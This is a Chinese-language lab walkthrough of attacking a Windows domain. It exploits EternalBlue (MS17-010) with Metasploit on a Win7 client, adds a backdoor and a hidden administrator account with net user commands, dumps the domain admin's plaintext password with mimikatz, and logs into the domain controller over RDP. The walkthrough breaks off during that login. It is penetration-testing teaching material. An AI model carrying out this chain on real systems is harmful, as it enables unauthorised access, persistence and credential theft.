一、实验机器

域控主机：win2008R2（192.168.15.142）
域客户机：win7（192.168.15.143）
攻击机：kali（192.168.15.129）

二、实验步骤

主机发现,找到域客户机，命令：nmap -sn 192.168.15.0/24

域客户机IP为192.168.15.143，对其进行端口扫描，命令：masscan --rate=10000 --ports 0-65535 192.168.15.143

可以看到域客户机开启了445端口，我们可以尝试利用MS17-010(永恒之蓝)漏洞来get域客户机的shell。开启msf判断域客户机中是否存在ms17-010漏洞。

永恒之蓝漏洞确实存在，我们进行利用。首先设置好参数

run起来，成功拿到了meterpreter。

whoami之后我们发现自己是system权限

这里有一种方法可以让我们远程连接到域客户机

给域客户机中添加一个用户，用户名为b，密码为：!@#123QWEqwe。命令：net user b !@#123QWEqwe /add

这里还可以添加隐藏的用户，只需要加一个$符号即可，命令：net user d$ !@#123QWEqwe /add

接下来将b用户放到管理员组中，命令：net localgroup administrators b /add

域客户机是开启了3389端口的（没有开的话可以自己开一下），我们可以使用rdesktop命令来连接它，命令：rdesktop 192.168.15.143:3389

这里点击其他用户，使用我们刚才创建的b用户进行登录

在登陆时会挤掉之前在域客户机中登录的cxx用户。

登录成功。我们成功的拿下了域客户机。

只是拿下了域客户机是不够的，我们需要拿下域控，接下来我们看看拿下域控主机的步骤。

首先需要知道域控主机的IP，我们执行命令：net gorup "domain controllers" /domain。可以拿到域控主机的名字。然后ping主机名，可得到IP

可知域控主机的IP为192.168.15.142。再执行命令：net group "domain admins" /domain，可以得知域管理用户名。

域管理用户名为：Administrator。然后我们退出shell，回到meterpreter，执行load mimikatz命令，加载猕猴桃。然后再执行kerberos命令，获取明文密码。

我们获取到了Administrator用户的密码为123.Com。然后我们再连接到域客户机，命令：rdesktop 192.168.15.143:3389，点击其他用户进行登录。

用之前创建的b用户进行登录。

登录成功

然后执行mstsc，在域客户机上远程连接域控主机。

IP是之前获得的

这里选择使用其他用户进行登录

用Administrator ：123.Com进行登录

这里点击是